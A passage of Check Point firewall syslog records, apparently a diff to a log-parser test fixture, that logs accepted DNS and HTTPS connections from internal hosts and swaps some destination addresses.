originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35651"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35133"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35651"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38448"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33172"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35210"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33343"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33172"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35210"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33343"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"185.33.223.203"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44544"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"185.33.223.203"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44546"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"185.33.223.203"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44548"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56783"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33252"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56783"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33252"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d915,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; 
outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61095"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d915,0x14,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55762"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x15,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54244"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d915,0x16,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"194.29.39.10"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"62020"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10001"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33138"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55788"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41787"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50638"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33138"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55788"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41787"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50638"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52424"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; 
